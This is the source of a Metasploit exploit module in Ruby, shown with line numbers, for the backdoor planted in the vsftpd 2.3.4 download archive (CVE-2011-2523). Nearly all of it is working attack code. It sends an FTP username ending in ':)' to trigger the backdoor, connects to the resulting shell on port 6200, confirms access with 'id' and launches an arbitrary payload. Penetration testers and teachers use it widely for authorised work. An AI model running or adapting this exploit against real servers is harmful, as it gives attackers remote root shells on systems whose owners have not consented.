1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'VSFTPD v2.3.4 Backdoor Command Execution',
16
        'Description' => %q{
17
          This module exploits a malicious backdoor that was added to the	VSFTPD download
18
          archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
19
          June 30th 2011 and July 1st 2011 according to the most recent information
20
          available. This backdoor was removed on July 3rd 2011.
21
        },
22
        'Author' => [ 'hdm', 'MC' ],
23
        'License' => MSF_LICENSE,
24
        'References' => [
25
          [ 'CVE', '2011-2523' ],
26
          [ 'OSVDB', '73573'],
27
          [ 'URL', 'http://pastebin.com/AetT9sS5'],
28
          [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
29
        ],
30
        'Privileged' => true,
31
        'Platform' => [ 'unix' ],
32
        'Arch' => ARCH_CMD,
33
        'Payload' => {
34
          'Space' => 2000,
35
          'BadChars' => '',
36
          'DisableNops' => true,
37
          'Compat' =>
38
                        {
39
                          'PayloadType' => 'cmd_interact',
40
                          'ConnectionType' => 'find'
41
                        }
42
        },
43
        'Targets' => [
44
          [ 'Automatic', {} ],
45
        ],
46
        'DisclosureDate' => '2011-07-03',
47
        'DefaultTarget' => 0,
48
        'Notes' => {
49
          'Reliability' => UNKNOWN_RELIABILITY,
50
          'Stability' => UNKNOWN_STABILITY,
51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
52
        }
53
      )
54
    )
55

56
    register_options([ Opt::RPORT(21) ])
57
  end
58

59
  def exploit
60
    nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
61
    if nsock
62
      print_status("The port used by the backdoor bind listener is already open")
63
      handle_backdoor(nsock)
64
      return
65
    end
66

67
    # Connect to the FTP service port first
68
    connect
69

70
    banner = sock.get_once(-1, 30).to_s
71
    print_status("Banner: #{banner.strip}")
72

73
    sock.put("USER #{rand_text_alphanumeric(rand(6) + 1)}:)\r\n")
74
    resp = sock.get_once(-1, 30).to_s
75
    print_status("USER: #{resp.strip}")
76

77
    if resp =~ /^530 /
78
      print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
79
      disconnect
80
      return
81
    end
82

83
    if resp !~ /^331 /
84
      print_error("This server did not respond as expected: #{resp.strip}")
85
      disconnect
86
      return
87
    end
88

89
    sock.put("PASS #{rand_text_alphanumeric(rand(6) + 1)}\r\n")
90

91
    # Do not bother reading the response from password, just try the backdoor
92
    nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
93
    if nsock
94
      print_good("Backdoor service has been spawned, handling...")
95
      handle_backdoor(nsock)
96
      return
97
    end
98

99
    disconnect
100
  end
101

102
  def handle_backdoor(s)
103
    s.put("id\n")
104

105
    r = s.get_once(-1, 5).to_s
106
    if r !~ /uid=/
107
      print_error("The service on port 6200 does not appear to be a shell")
108
      disconnect(s)
109
      return
110
    end
111

112
    print_good("UID: #{r.strip}")
113

114
    s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
115
    handler(s)
116
  end
117
end
118

119